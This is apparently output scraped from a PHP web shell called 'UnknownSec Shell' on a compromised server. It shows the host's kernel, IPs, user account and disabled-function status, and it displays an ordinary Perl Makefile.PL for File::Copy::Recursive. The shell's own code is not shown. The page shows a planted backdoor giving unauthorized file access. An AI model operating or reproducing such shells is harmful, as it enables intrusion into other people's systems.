shell bypass 403

UnknownSec Shell

Uname: Linux dedi-15171674.espacofacial.com.br 5.14.0-687.36.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 7 05:40:49 EDT 2026 x86_64
Software: Apache
PHP version: 8.2.33 [ PHP INFO ] PHP os: Linux
Server Ip: 172.67.154.186
Your Ip: 216.73.216.55
User: espa7358 (1004) | Group: espa7358 (1003)
Safe Mode: OFF
Disable Function:
NONE

name : Makefile.PL
use strict;
use warnings;
use ExtUtils::MakeMaker;

WriteMakefile(
    NAME          => 'File::Copy::Recursive',
    VERSION_FROM  => 'lib/File/Copy/Recursive.pm',
    ABSTRACT_FROM => 'lib/File/Copy/Recursive.pm',
    AUTHOR        => 'Daniel Muey <http://drmuey.com/cpan_contact.pl>',
    LICENSE       => 'perl_5',
    PREREQ_PM     => {
        'File::Copy' => 0,
        'File::Spec' => 0,
        'File::Glob' => 0,
        'Cwd'        => 0,
    },
    TEST_REQUIRES => {
        'Test::More'       => '0.88',
        'Test::Deep'       => 0,
        'Test::File'       => 0,
        'File::Temp'       => 0,
        'Test::Warnings'   => 0,
        'Path::Tiny'       => 0,
        'Test::Fatal'      => 0,
    },
    META_ADD => {
        'meta-spec'    => { version => 2 },
        dynamic_config => 0,
        resources      => {
            repository => {
                url  => 'https://github.com/drmuey/p5-File-Copy-Recursive.git',
                web  => 'https://github.com/drmuey/p5-File-Copy-Recursive',
                type => 'git',
            },
            bugtracker => {
                web    => 'https://github.com/drmuey/p5-File-Copy-Recursive/issues',
            },
        },
    },
);
© 2026 UnknownSec